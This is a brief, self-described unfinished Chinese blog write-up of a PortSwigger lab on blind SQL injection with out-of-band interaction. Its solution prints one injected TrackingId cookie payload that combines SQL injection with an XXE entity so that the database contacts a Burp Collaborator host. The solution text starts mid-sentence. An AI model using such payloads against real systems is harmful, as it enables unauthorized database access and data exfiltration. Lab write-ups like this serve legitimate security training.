Lab: Blind SQL injection with out-of-band interaction：利用外带交互的盲注（半成品）

Posted 2021-09-07 Zeker62

靶场内容：

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.

Learning path

note：
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems.
To solve the lab, you must use Burp Collaborator’s default public server (burpcollaborator.net).

解决方法

• 这里直接使用xxe注入
• server. For example, you can combine SQL injection with basic XXE techniques as follows: TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//xxxxxxxxxxxxxxxxxxxxxxxxxxx.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--. 比较复杂，建议读者百度一些教程观看